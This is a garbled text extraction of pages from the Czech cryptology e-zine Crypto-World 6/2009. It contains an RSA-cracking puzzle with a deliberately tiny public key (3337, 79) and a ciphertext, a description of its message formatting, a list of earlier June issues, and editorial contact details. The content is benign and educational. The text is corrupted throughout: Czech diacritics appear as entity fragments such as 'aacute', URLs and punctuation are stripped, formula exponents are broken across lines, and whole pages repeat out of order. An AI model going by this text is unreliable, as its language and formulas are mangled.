d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 18: Sešit 6/2009 (452 kB)

Crypto-World 62009

18

Přiacuteklad použitiacute freewaroveacuteho naacutestroje ISDOCReader na ověřeniacute elpodpisu

Pokud se některyacute z laskavyacutech čtenaacuteřů bude zajiacutemat o projekt ISDOC podrobněji dalšiacute informace včetně posledniacute verze formaacutetu dokumentace jeho datovyacutech struktur přiacutekladů datovyacutech souborů i aktuaacutelniacutech uacutedajů o podpoře formaacutetu jednotlivyacutemi vyacuterobci software nalezne na adrese wwwisdoccz Literatura

[1] Kolektiv autorů Dokumentace ke standardu UBL 20 [online] Dostupnyacute z WWW lthttpdocsoasis-openorgublcs-UBL-20UBL-20htmlgt

[2] Kosek Jiřiacute XML scheacutemata [online] Dostupnyacute z WWW lthttpwwwkosekczxmlschemawxshtmlgt

[3] Kolektiv autorů XSD Schema tutorial [online] Dostupnyacute z WWW lthttpwwww3schoolscomschemadefaultaspgt

[4] Kolektiv autorů sdruženiacute W3c Dokumentace ke Xmldsig [online] Dostupnyacute z WWW lthttpwwww3orgTRxmldsig-coregt

[5] Kolektiv autorů Pracovniacute skupiny pro elektronickou fakturaci SPIS Dokumentace k formaacutetu ISDOC [online] Dostupnyacute z WWW lthttpwwwisdocczgt

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

a lehkyacute uacutevod do časoveacute synchronizace (P Vondruška) 5-9 C Univerzaacutelniacute posilovače hašovaciacutech funkciacute včetně MD5 a SHA1

aneb zaacutechranneacute kolo pro zoufalce (V Kliacutema) 10-14 D NIST (National Institute of Standards and Technology - USA) a kryptografie Recommendation on Key Management ndash čaacutest 2

(J Pinkava) 15-18 E O čem jsme psali v červnu 1999-2005 19-20 F Zaacutevěrečneacute informace 21

Crypto-World 62007 A Přehled a historie polyalfabetickyacutech šifer (PVondruška) 2-11 B Matematizace komplexniacute bezpečnosti v ČR čaacutest I (JHrubyacute) 12-20 C Mikulaacutešskaacute kryptobesiacutedka Call for Papers 21 D O čem jsme psali v červnu 2000-2006 22-23 E Zaacutevěrečneacute informace 24 Přiacuteloha Mikulaacutešskaacute kryptobesiacutedka (6-7122007)- MKB2007_CallForPapers_cervenpdf

Crypto-World 62008 A RFID Co to vlastně maacuteme v kapse (MHlavaacuteč TRosa) 2 - 17 B Bezpečnost PHP aplikaciacute (JVraacutena) 18 - 22 C Popis šifrovaciacuteho algoritmu Serpent (JJeřaacutebek) 24 - 29 D O čem jsme psali v červnu 2000-2007 30 ndash 31 E Zaacutevěrečneacute informace 32

Crypto-World 62009

23

F Zaacutevěrečneacute informace 1 Sešit Crypto-World je oficiaacutelniacute informačniacute sešit Kryptologickeacute sekce Jednoty českyacutech matematiků a fyziků (GCUCMP) Obsahuje člaacutenky podepsaneacute autory Přiacutepadneacute chyby a nepřesnosti jsou diacutelem PVondrušky a autorů jednotlivyacutech podepsanyacutech člaacutenků GCUCMP za ně nemaacute odbornou ani jinou zodpovědnost Adresa URL na niacutež můžete najiacutet tento sešit (zpravidla 3 tyacutedny po jeho rozeslaacuteniacute) a předchoziacute sešity GCUCMP denně aktualizovaneacute novinky z kryptologie a informačniacute bezpečnosti normy standardy straacutenky některyacutech členů a dalšiacute souvisejiacuteciacute materiaacutely httpcrypto-worldinfo 2 Registrace zrušeniacute registrace Zaacutejemci o e-zin se mohou zaregistrovat pomociacute e-mailu na adrese pavelvondruskacrypto-worldinfo (předmět Crypto-World) nebo použiacutet k odeslaacuteniacute žaacutedosti o registraci elektronickyacute formulaacuteř na httpcrypto-worldinfo Při registraci vyžadujeme pouze jmeacuteno a přiacutejmeniacute titul pracoviště (neniacute podmiacutenkou) a e-mail adresu určenou k zasiacutelaacuteniacute koacutedů ke staženiacute sešitu Ke zrušeniacute registrace stačiacute zaslat kraacutetkou zpraacutevu na e-mail pavelvondruskacrypto-worldinfo (předmět rušiacutem odběr Crypto-Worldu) nebo opět použiacutet formulaacuteř na httpcrypto-worldinfo Ve zpraacutevě prosiacutem uveďte jmeacuteno a přiacutejmeniacute a e-mail adresu na kterou byly koacutedy zasiacutelaacuteny 3 Redakce

E-zin Crypto-World Redakčniacute praacutece Pavel Vondruška Staacuteliacute přispěvateleacute Pavel Vondruška Jaroslav Pinkava Jazykovaacute uacuteprava Jakub Vraacutena Přehled autorů httpcrypto-worldinfoobsahautoripdf NEWS Vlastimil Kliacutema (vyacuteběr přiacutespěvků Jaroslav Pinkava komentaacuteře a Tomaacuteš Rosa vklaacutedaacuteniacute na web) Pavel Vondruška Webmaster Pavel Vondruška jr 4 Spojeniacute (abecedně) redakce e-zinu ezincrypto-worldinfo httpcrypto-worldinfo Vlastimil Kliacutema vklimavolnycz httpcryptographyhyperlinkcz Jaroslav Pinkava JaroslavPinkavazonercz httpcrypto-worldinfopinkava Tomaacuteš Rosa t_rosavolnycz httpcryptohyperlinkcz Pavel Vondruška pavelvondruskacrypto-worldinfo httpcrypto-worldinfovondruskaindexphp Pavel Vondruškajr pavelcrypto-worldinfo httpwebdesigncrypto-worldinfo Jakub Vraacutena jakubvranacz httpwwwvranacz

Page 19: Sešit 6/2009 (452 kB)

Crypto-World 62009

19

D Malaacute soutěž v luštěniacute RSA Pavel Vondruška (pavelvondruskacrypto-worldinfo)

Pro přiacuteznivce našich podzimniacutech soutěžiacute v luštěniacute ale samozřejmě i dalšiacute čtenaacuteře jsem připravil naacutesledujiacuteciacute drobnou uacutelohu Soutěžniacutem uacutekolem je rozluštěniacute šifroveacuteho textu 14 39 07 57 18 34 10 47 17 92 06 31 28 65 32 92 11 41 26 31 26 29 20 80 25 06 00 77 03 60 09 00 03 60 11 44 31 00 05 41 07 92 06 16 04 70 10 75 03 60 18 79 00 46 26 73 23 49 25 18 13 90 K zašifrovaacuteniacute otevřeneacuteho textu byl použit algoritmus RSA a formaacutetovaacuteniacute CW10 (detaily viz naacutepověda) veřejnyacute kliacuteč je (Ne)=(3337 79)

Při luštěniacute se řešitel seznaacutemiacute s algoritmem RSA a uvědomiacute si jak uacutezce souvisiacute bezpečnost algoritmu s modulem N Pro prveacute dva řešitele je připravena odměna V přiacutepadě zaacutejmu se mohou bezplatně zuacutečastnit kurzu Problematika infrastruktury veřejnyacutech kliacutečů (PKI)ldquo kterou 2562009 pořaacutedaacute akademie CZNIC (httpwwwnicczakademiecourse15detail) Lektorem kurzu je PVondruška Svaacute řešeniacute zasiacutelejte na adresu pavelvondruskacrypto-worldinfo Řešeniacute uacutelohy a jmeacutena všech uacutespěšnyacutech luštitelů budou zveřejněna v letniacutem dvojčiacutesle e-zinu Crypto-World 7-82009 kteryacute vyjde 182009 Z tohoto důvodu společně s řešeniacutem zašlete souhlas se zveřejněniacutem sveacuteho jmeacutena resp nickpseudonym kteryacute může byacutet miacutesto něj zveřejněn Přeji pěknou zaacutebavu

Doplňujiacuteciacute informace k soutěžniacute uacuteloze

1 Použityacute šifrovaciacute algoritmus

V podstatě se jednaacute o klasickyacute šifrovaciacute algoritmus založenyacute na RSA kde však otevřenyacute text neniacute formaacutetovaacuten podle PKCS 1 (verze 152021) ale podle naacutemi zadanyacutech pravidel kteraacute označiacuteme jako CW 10 2 Asymetrickyacute algoritmus RSA

Zvoliacuteme prvočiacutesla p a q a vypočteme N = pq

Φ(N) = (p-1)(q-1)

Daacutele zvoliacuteme naacutehodneacute čiacuteslo e kde

Crypto-World 62009

20

1 lt e lt Φ(N) takoveacute že e a Φ(N) jsou nesoudělnaacute

Vypočteme čiacuteslo d takoveacute že

1 lt d lt Φ(N) a

ed equiv 1 mod Φ(N)

Dvojici (Nd) nazveme soukromyacute kliacuteč a (Ne) veřejnyacute kliacuteč

3 Formaacutetovaacuteniacute zpraacutevy (CW10)

Zpraacutevu M překoacutedujeme nejprve do čiacuteselneacuteho tvaru K tomu použijeme některou vhodnou převodovou tabulku Např tuto tabulku

0 1 2 3 4 5 6 7 8 9 6 0 Mezera 2 3 4 A B C D E 7 F G H I J K L M N O 8 P Q R S T U V W X Y 9 Z 1 2 3 4 5 6 7 8 9 Zpraacutevu M pak zformaacutetujeme do posloupnosti čiacutesel pevneacute deacutelky (deacutelka bude rovna deacutelce modulu N) K tomu použijeme vlastniacute formaacutetovaacuteniacute kteraacute pracovně nazveme CW10 Formaacutetovaacuteniacute CW10 1) Maacute-li modul deacutelku k budeme zpraacutevu převedenou podle tabulky dělit na skupiny deacutelky k-1 2) Všechny skupiny musiacute miacutet deacutelku k-1 nemaacute-li proto posledniacute skupina tuto deacutelku doplniacuteme

ji zprava přiacuteslušnyacutem počtem nul 3) Všechny ziacuteskaneacute skupiny nyniacute doplniacuteme zleva jednou nulou Deacutelka každeacute skupiny je po

těchto uacutepravaacutech rovna k 4) Vyacutesledek po šifrovaacuteniacute maacute deacutelku rovnou maximaacutelně k nemaacute-li ji doplniacuteme vyacutesledek zleva

nulami Ziacuteskanyacute vyacutesledek po formaacutetovaacuteniacute M označme M= m1 m2 m3 hellip 4 Zašifrovaacuteniacute zpraacutevy M

Zašifrovaacuteniacutem zpraacutevy M pomociacute veřejneacuteho kliacuteče (Ne) rozumiacuteme řetězec

P = C1 C2 C3 kde

C1 equiv m1e mod N C2 equiv m2

e mod N C3 equiv m3e mod N Ci equiv mi

e mod N

5 Dešifrovaacuteniacute zpraacutevy P

Dešifrovaacuteniacute zpraacutevy P se pak provede tak že použijeme soukromyacute exponent d a tiacutem ziacuteskaacuteme původniacute zpraacutevu M

m1 equiv C1d mod N m2 equiv C2

d mod N m3 equiv C3d mod N mi equiv Cid mod N

6 Bezpečnost Pokud dokaacuteže přiacutejemce udržet svůj soukromyacute kliacuteč v tajnosti (a čiacutesla p a q byla dostatečně velkaacute) pak je ze znalosti šifroveacute zpraacutevy a veřejneacuteho kliacuteče vyacutepočetně složiteacute ziacuteskat otevřenou zpraacutevu

Crypto-World 62009

21

E O čem jsme psali v červnu 2000 ndash 2008 Crypto-World 62000 A Novaacute evropskaacute iniciativa v oblasti kryptografie (JPinkava) 2 B Fermatův test primality Carmichaelova čiacutesla bezčtvercovaacute čiacutesla (PVondruška)3 -5 C Červ LOVE-LETTER-FOR-YOUTXTVBS (PVondruška) 6-8 D EUROCRYPT 2000 (PVondruška) 9-11 E Code Talkers (IIIdiacutel) (PVondruška) 12-14 F Letem šifrovyacutem světem 15 G Zaacutevěrečneacute informace 16 Přiacuteloha Navajo Code Talkers revize z 1561945 soubor Dictionaryhtm

Crypto-World 62001 A Zaacutehadnaacute paacuteska z Prahy IIdiacutel (PVondruška JJanečko) 2- 6 B Radioaktivniacute rozpad a kryptografickeacute kliacuteče (LSmoliacutek) 7-9 C Kryptografie a normy diacutel 8 - Normy IETF - SMIME (J Pinkava) 10-13 D Počiacutetačovyacute kurs Lidovyacutech novin (PVondruška) 14-15 E Security and Protection of Information (D Cvrček) 16 F Praacutevniacute odpovědnost poskytovatelů (JMatejka) 17-23 G Ukončeniacute platnosti zneplatněniacute (a zrušeniacute) certifikaacutetu IIdiacutel (JProkeš) 24-25 H Letem šifrovyacutem světem 26-27 I Zaacutevěrečneacute informace 28 Přiacuteloha priloha6zip (fotografie Security 2001 teacutemata přednaacutešek na konferenci Eurocryptacute2001)

Crypto-World 62002 A Historie a statistika Crypto-Worldu (PVondruška) 2-4 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 4 (JPinkava) 5-8 C Bezpečnost informačniacuteho systeacutemu pro certifikačniacute služby (ISCS)

a objektovaacute bezpečnost (PVondruška) 9-16 D Informace - Cryptology ePrint Archive (VKliacutema) 17 E Letem šifrovyacutem světem 18-19

1 Kritika člaacutenku Je 1024-bitovaacute deacutelka kliacuteče RSA dostatečnaacute (Crypto-World 52002)

2 Zaacutekon o elektronickeacutem podpisu novelizovaacuten - Zaacutekon č 2262002 Sb 3 Hackeři pomozte 4 O čem jsme psali v červnu 2000 a 2001

F Zaacutevěrečneacute informace 20

Crypto-World 62003 A Nebezpečiacute internetovyacutech řešeniacute (MKuchař) 2-6 B Digitaacutelniacute certifikaacutety IETF-PKIX čaacutest 13

Atributoveacute certifikaacutety ndash diacutel 2 (JPinkava) 7-10 C Kryptografickeacute protokoly s nulovyacutem předaacuteniacutem znalostiacute(JPinkava) 11-12 D Elektronickeacute peniacuteze (PVondruška) 13-20 E Letem šifrovyacutem světem 21-23 F Zaacutevěrečneacute informace 24

Crypto-World 62009

22

Crypto-World 62004 A Měsiacutec prvočiacutesel (PVondruška) 2-5 B Statistickyacute rozbor největšiacuteho prvočiacutesla (PTesař) 6-7 C Program STORK - vstupniacute dokumenty přiacuteprava (E-CRYPT) čaacutest 2 (JPinkava) 8-16 D Letem šifrovyacutem světem 17-18 E Zaacutevěrečneacute informace 19

Crypto-World 62005 A Informace pro čtenaacuteře a autory (PVondruška) 2-3 B Kontrola certifikačniacute cesty čaacutest 1 (P Rybaacuter) 4-11 C O neziacuteskateľnosti rodneacuteho čiacutesla z jeho hashu (M Pivoluska) 12-13 D Přehledovaacute zpraacuteva o vyacuteznamnyacutech publikaciacutech a projektech na teacutema

poskytovaacuteniacute anonymity klasifikace a měřitelnost informačniacuteho soukromiacute (privacy) čaacutest 2 (M Kumpošt) 14-17

E Kryptografickeacute eskalačniacute protokoly čaacutest 1 (J Krhovjaacutek) 18-21 F Recenze knihy Jon Erickson Hacking - uměniacute exploitace 22 G O čem jsme psali v červnu 2000-2004 23 H Zaacutevěrečneacute informace 24

Crypto-World 62006 A PKI roaming (L Dostaacutelek) 2-4 B Vyhlaacuteška o podrobnostech atestačniacuteho řiacutezeniacute pro elektronickeacute naacutestroje

